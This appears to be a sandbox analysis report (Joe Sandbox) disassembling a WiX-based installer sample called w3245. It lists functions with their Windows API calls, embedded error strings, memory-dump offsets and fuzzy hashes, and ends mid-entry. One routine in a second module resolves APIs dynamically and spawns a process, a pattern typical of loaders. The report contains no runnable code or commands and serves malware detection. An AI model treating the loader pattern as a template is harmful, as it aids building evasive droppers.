                                                                                                                                                              • String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting string variable '%ls' to value '%ls'$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%hu.%hu.%hu.%hu'$Unsetting variable '%ls'$variable.cpp
                                                                                                                                                              • API String ID: 2716280545-445000439
                                                                                                                                                              • Opcode ID: 189cdb22021aebc13841788bdd11ba93d0a285cdfa91f99fc15920504831078a
                                                                                                                                                              • Instruction ID: 4f73736faf8adff4a5813bdebee24383451ce9edc2c2da04158334afdabeb7ee
                                                                                                                                                              • Opcode Fuzzy Hash: 189cdb22021aebc13841788bdd11ba93d0a285cdfa91f99fc15920504831078a
                                                                                                                                                              • Instruction Fuzzy Hash: 53510975A4022EFBDB309F29ED4AF6B7BB8EB95718F100519F804562C2C271DC61DAE1
                                                                                                                                                              Function 00A04AE5 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 144windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • IsWindow.USER32(?), ref: 00A04C64
                                                                                                                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00A04C75
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to create the message window., xrefs: 00A04B98
                                                                                                                                                              • Failed to set registration variables., xrefs: 00A04BDE
                                                                                                                                                              • Failed to check global conditions, xrefs: 00A04B49
                                                                                                                                                              • WixBundleLayoutDirectory, xrefs: 00A04BF5
                                                                                                                                                              • Failed while running , xrefs: 00A04C2A
                                                                                                                                                              • Failed to set layout directory variable to value provided from command-line., xrefs: 00A04C06
                                                                                                                                                              • Failed to set action variables., xrefs: 00A04BC4
                                                                                                                                                              • Failed to query registration., xrefs: 00A04BAE
                                                                                                                                                              • Failed to open log., xrefs: 00A04B18
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessagePostWindow
                                                                                                                                                              • String ID: Failed to check global conditions$Failed to create the message window.$Failed to open log.$Failed to query registration.$Failed to set action variables.$Failed to set layout directory variable to value provided from command-line.$Failed to set registration variables.$Failed while running $WixBundleLayoutDirectory
                                                                                                                                                              • API String ID: 3618638489-3051724725
                                                                                                                                                              • Opcode ID: beccecda177b6dea44c61093efa9cea9ada1b68651dc1016bb45db531fed9719
                                                                                                                                                              • Instruction ID: b4ef906f2b7dcc09493aacf8d40822122ade6f2372d5d2034f26aa588f75096f
                                                                                                                                                              • Opcode Fuzzy Hash: beccecda177b6dea44c61093efa9cea9ada1b68651dc1016bb45db531fed9719
                                                                                                                                                              • Instruction Fuzzy Hash: B74107B1A0161EBBDB265B74EE45FBAB66CFF09750F000615FA04961D0DBB0EC5097E0
                                                                                                                                                              Function 00A1EA7D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 101threadCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,00A0548E,?,?), ref: 00A1EA9D
                                                                                                                                                              • GetLastError.KERNEL32(?,00A0548E,?,?), ref: 00A1EAAA
                                                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_0001E7B4,?,00000000,00000000), ref: 00A1EB03
                                                                                                                                                              • GetLastError.KERNEL32(?,00A0548E,?,?), ref: 00A1EB10
                                                                                                                                                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,00A0548E,?,?), ref: 00A1EB4B
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00A0548E,?,?), ref: 00A1EB6A
                                                                                                                                                              • CloseHandle.KERNELBASE(?,?,00A0548E,?,?), ref: 00A1EB77
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
                                                                                                                                                              • String ID: Failed to create initialization event.$Failed to create the UI thread.$uithread.cpp
                                                                                                                                                              • API String ID: 2351989216-3599963359
                                                                                                                                                              • Opcode ID: 4f2324c5dadc7100ea71168341e6d759d421fd9be40da2e1154732cd14ae6bc7
                                                                                                                                                              • Instruction ID: 3d8d6362ee1fefb0feb57c6406646dd73739f6d26f370a01b5cbc4456538307e
                                                                                                                                                              • Opcode Fuzzy Hash: 4f2324c5dadc7100ea71168341e6d759d421fd9be40da2e1154732cd14ae6bc7
                                                                                                                                                              • Instruction Fuzzy Hash: 77318D7AE01229BBDB10DFE99D85ADFBABCBF04751F114165BD05F7280E6709E408AA0
                                                                                                                                                              Function 00A214E1 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 91threadCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,74DF2F60,?,?,00A05405,00A053BD,00000000,00A05445), ref: 00A21506
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00A21519
                                                                                                                                                              • GetExitCodeThread.KERNELBASE(00A4B488,?), ref: 00A2155B
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00A21569
                                                                                                                                                              • ResetEvent.KERNEL32(00A4B460), ref: 00A215A4
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00A215AE
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
                                                                                                                                                              • String ID: Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$cabextract.cpp
                                                                                                                                                              • API String ID: 2979751695-3400260300
                                                                                                                                                              • Opcode ID: c97b1dde0b2e59b566aa40414d3b958f46da3f3839e8bcc70fb25242f50b39bc
                                                                                                                                                              • Instruction ID: ecb630a51296e32bd02cfb15db9e6c495b8c7d2c2c870c02946984831c32451a
                                                                                                                                                              • Opcode Fuzzy Hash: c97b1dde0b2e59b566aa40414d3b958f46da3f3839e8bcc70fb25242f50b39bc
                                                                                                                                                              • Instruction Fuzzy Hash: A431C475B00215FBDB10DFAD9D05AAE7AF8FB94301F1085AAF902D61A0E771CA019B61
                                                                                                                                                              Function 00A02DBF Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 203sleepfiletimeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?,00000000,00000000,00000000), ref: 00A02E5F
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00A02E69
                                                                                                                                                              • GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00A02F09
                                                                                                                                                              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 00A02F96
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00A02FA3
                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00A02FB7
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00A0301F
                                                                                                                                                              Strings
                                                                                                                                                              • %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls, xrefs: 00A02F66
                                                                                                                                                              • pathutil.cpp, xrefs: 00A02E8D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$CloseCreateFileHandleLocalPathSleepTempTime
                                                                                                                                                              • String ID: %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$pathutil.cpp
                                                                                                                                                              • API String ID: 3480017824-1101990113
                                                                                                                                                              • Opcode ID: 07d26a7303aeb382df1916d2865188cd5f9e72864eebd066b0461717ef0af4dc
                                                                                                                                                              • Instruction ID: fe9a22086079a52971f4d5bb91ea98cc9952827320ed1f8d46611c7fb9486584
                                                                                                                                                              • Opcode Fuzzy Hash: 07d26a7303aeb382df1916d2865188cd5f9e72864eebd066b0461717ef0af4dc
                                                                                                                                                              • Instruction Fuzzy Hash: 9F718576D4122DABDB309FA8ED4DBAAB7B8AB08710F1001E5F904A71D0D7749E81CF60
                                                                                                                                                              Function 00A0CBC5 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 144COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,FFFEB88D,000000FF,00000001,000000FF,?,00000001,00A053BD,00000000,00A05489,00A05445,WixBundleUILevel,840F01E8,?,00000001), ref: 00A0CC1C
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to extract file., xrefs: 00A0CCE7
                                                                                                                                                              • payload.cpp, xrefs: 00A0CD1D
                                                                                                                                                              • Failed to find embedded payload: %ls, xrefs: 00A0CC48
                                                                                                                                                              • Failed to ensure directory exists, xrefs: 00A0CCEE
                                                                                                                                                              • Payload was not found in container: %ls, xrefs: 00A0CD29
                                                                                                                                                              • Failed to concat file paths., xrefs: 00A0CCFC
                                                                                                                                                              • Failed to get next stream., xrefs: 00A0CD03
                                                                                                                                                              • Failed to get directory portion of local file path, xrefs: 00A0CCF5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CompareString
                                                                                                                                                              • String ID: Failed to concat file paths.$Failed to ensure directory exists$Failed to extract file.$Failed to find embedded payload: %ls$Failed to get directory portion of local file path$Failed to get next stream.$Payload was not found in container: %ls$payload.cpp
                                                                                                                                                              • API String ID: 1825529933-1711239286
                                                                                                                                                              • Opcode ID: 500b2219522b10636aa948358ee58b85e05f392d82f09101b6b23ef78b18859b
                                                                                                                                                              • Instruction ID: da79e7e1b03179a48821e8d1b1da32858e11d38a7d311fd667caaae290a98af8
                                                                                                                                                              • Opcode Fuzzy Hash: 500b2219522b10636aa948358ee58b85e05f392d82f09101b6b23ef78b18859b
                                                                                                                                                              • Instruction Fuzzy Hash: 5041CE35D0021DFFCF259F98ED81AAEBBB5BF40721B118269E905AB2E1D7709D40DB90
                                                                                                                                                              Function 00A04796 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 128windowthreadCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • PeekMessageW.USER32(00000000,00000000,00000400,00000400,00000000), ref: 00A047BB
                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00A047C1
                                                                                                                                                              • GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00A0484F
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to create engine for UX., xrefs: 00A047DB
                                                                                                                                                              • Failed to start bootstrapper application., xrefs: 00A0481D
                                                                                                                                                              • engine.cpp, xrefs: 00A0489B
                                                                                                                                                              • Unexpected return value from message pump., xrefs: 00A048A5
                                                                                                                                                              • wininet.dll, xrefs: 00A047EE
                                                                                                                                                              • Failed to load UX., xrefs: 00A04804
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Message$CurrentPeekThread
                                                                                                                                                              • String ID: Failed to create engine for UX.$Failed to load UX.$Failed to start bootstrapper application.$Unexpected return value from message pump.$engine.cpp$wininet.dll
                                                                                                                                                              • API String ID: 673430819-2573580774
                                                                                                                                                              • Opcode ID: 01c7c8548b17579040eafb3f7595539f27f701783401147567da9015e03abfae
                                                                                                                                                              • Instruction ID: 6693c247fae9c39e41116a898d3e4cc1d98707fa4950c0760aee8f5949b9d0d7
                                                                                                                                                              • Opcode Fuzzy Hash: 01c7c8548b17579040eafb3f7595539f27f701783401147567da9015e03abfae
                                                                                                                                                              • Instruction Fuzzy Hash: 984193B6A00559BFDB109BA4EC85EBA77ACFF48314F104525FA04E71D0DB31ED4987A0
                                                                                                                                                              Function 00A0D6C9 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 65libraryloaderCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008,00000000,?,00A047FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00A0548E,?), ref: 00A0D6DA
                                                                                                                                                              • GetLastError.KERNEL32(?,00A047FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00A0548E,?,?), ref: 00A0D6E7
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,BootstrapperApplicationCreate), ref: 00A0D71F
                                                                                                                                                              • GetLastError.KERNEL32(?,00A047FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00A0548E,?,?), ref: 00A0D72B
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$AddressLibraryLoadProc
                                                                                                                                                              • String ID: BootstrapperApplicationCreate$Failed to create UX.$Failed to get BootstrapperApplicationCreate entry-point$Failed to load UX DLL.$userexperience.cpp
                                                                                                                                                              • API String ID: 1866314245-2276003667
                                                                                                                                                              • Opcode ID: 71430033058b236bbd746dedc5a562d83a10ee54e4eda500fdf24d3f4fc834a4
                                                                                                                                                              • Instruction ID: 389a7cf4008d2ababf74dac1dcd816815b385dbefc346ac83f35e70de3f4f2ab
                                                                                                                                                              • Opcode Fuzzy Hash: 71430033058b236bbd746dedc5a562d83a10ee54e4eda500fdf24d3f4fc834a4
                                                                                                                                                              • Instruction Fuzzy Hash: E211C83FA80736BBCB3197D8AC05F5B6A947B45761F014925BE10EB1C0D761DC0086E0
                                                                                                                                                              Function 00A0F812 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 117registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 00A0F942
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 00A0F94F
                                                                                                                                                              Strings
                                                                                                                                                              • Resume, xrefs: 00A0F8B6
                                                                                                                                                              • Failed to format pending restart registry key to read., xrefs: 00A0F846
                                                                                                                                                              • %ls.RebootRequired, xrefs: 00A0F82F
                                                                                                                                                              • Failed to open registration key., xrefs: 00A0F8AB
                                                                                                                                                              • Failed to read Resume value., xrefs: 00A0F8D8
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Close
                                                                                                                                                              • String ID: %ls.RebootRequired$Failed to format pending restart registry key to read.$Failed to open registration key.$Failed to read Resume value.$Resume
                                                                                                                                                              • API String ID: 3535843008-3890505273
                                                                                                                                                              • Opcode ID: f3a832b1648872e7e934bff56bdf313c60229877d1dac77ea184e765aa48415a
                                                                                                                                                              • Instruction ID: fc5cefcb669ea786b20630667334dd47aef5ca31774a235456fbd4ad1cbb0a6a
                                                                                                                                                              • Opcode Fuzzy Hash: f3a832b1648872e7e934bff56bdf313c60229877d1dac77ea184e765aa48415a
                                                                                                                                                              • Instruction Fuzzy Hash: 8241387590021DFFCB21DFA8E981BA9BBB4FB04350F158176ED10BBA90C371AE459B80
                                                                                                                                                              Function 5BB31332 Relevance: 12.1, APIs: 8, Instructions: 78libraryloadersleepCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleA.KERNEL32 ref: 5BB31342
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 5BB31357
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 5BB31363
                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,00000104), ref: 5BB31377
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 5BB313E9
                                                                                                                                                              • CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 5BB313FF
                                                                                                                                                              • Sleep.KERNELBASE ref: 5BB31407
                                                                                                                                                              • ExitProcess.KERNEL32(00000000), ref: 5BB3140C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1685088439.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1685076008.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685107441.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685121840.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685137554.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685153027.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProc$ModuleProcess$CreateExitFileHandleNameSleep
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1148150840-0
                                                                                                                                                              • Opcode ID: f0dd7a59c0bd5b43b3f9e5f35ad75e2b2e8d3d451f964b30678343650819a50a
                                                                                                                                                              • Instruction ID: 29308b35581844d5fbda9ce5f776adae6960d5a29273f979bf2b02e5f9c33764
                                                                                                                                                              • Opcode Fuzzy Hash: f0dd7a59c0bd5b43b3f9e5f35ad75e2b2e8d3d451f964b30678343650819a50a
                                                                                                                                                              • Instruction Fuzzy Hash: C521A172504314AFE712ABA4CC44AABBBEDFF48344F10442CF181A3590FBF6A844D792
                                                                                                                                                              Function 00A40523 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • EnterCriticalSection.KERNEL32(00A6B5FC,00000000,?,?,?,00A14207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00A054FA,?), ref: 00A40533
                                                                                                                                                              • CreateFileW.KERNEL32(40000000,00000001,00000000,00000000,00000080,00000000,?,00000000,?,?,?,00A6B5F4,?,00A14207,00000000,Setup), ref: 00A405D7
                                                                                                                                                              • GetLastError.KERNEL32(?,00A14207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00A054FA,?,?,?), ref: 00A405E7
                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00A14207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00A054FA,?), ref: 00A40621
                                                                                                                                                                • Part of subcall function 00A02DBF: GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00A02F09
                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00A6B5FC,?,?,00A6B5F4,?,00A14207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00A054FA,?), ref: 00A4067A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalFileSection$CreateEnterErrorLastLeaveLocalPointerTime
                                                                                                                                                              • String ID: logutil.cpp
                                                                                                                                                              • API String ID: 4111229724-3545173039
                                                                                                                                                              • Opcode ID: ef59131f7a24e23c72681f4a2f66c6077aa1db6ddb9477dd624659a6152c1b2a
                                                                                                                                                              • Instruction ID: e40c54c24f73ee64d01c60049733ddc50ac096daf0e3179c5d5aee9709d65225
                                                                                                                                                              • Opcode Fuzzy Hash: ef59131f7a24e23c72681f4a2f66c6077aa1db6ddb9477dd624659a6152c1b2a
                                                                                                                                                              • Instruction Fuzzy Hash: 4A31C839910219FFDB11AFA5DE45E9ABA7DEB80B50F024524FB02E7160D7B1CD50AFA0
                                                                                                                                                              Function 00A432F3 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 84memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00A43309
                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 00A43325
                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00A433AC
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00A433B7
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: StringVariant$AllocClearFreeInit
                                                                                                                                                              • String ID: `<u$xmlutil.cpp
                                                                                                                                                              • API String ID: 760788290-3482516102
                                                                                                                                                              • Opcode ID: f192116240ddaad6ba5d53f070748c7df720eba12b2298984c63abee3fca1743
                                                                                                                                                              • Instruction ID: a324c267dfbd0401520582efa8a7fef3e2363528adfaca3e723c76536d02826e
                                                                                                                                                              • Opcode Fuzzy Hash: f192116240ddaad6ba5d53f070748c7df720eba12b2298984c63abee3fca1743
                                                                                                                                                              • Instruction Fuzzy Hash: F021943A901219AFCF11DF95C848EAE7BB9AFC5711F154158F901AF250CB71EE018B90
                                                                                                                                                              Function 00A20B8E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to write during cabinet extraction., xrefs: 00A20C35
                                                                                                                                                              • cabextract.cpp, xrefs: 00A20C2B
                                                                                                                                                              • Unexpected call to CabWrite()., xrefs: 00A20BC1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
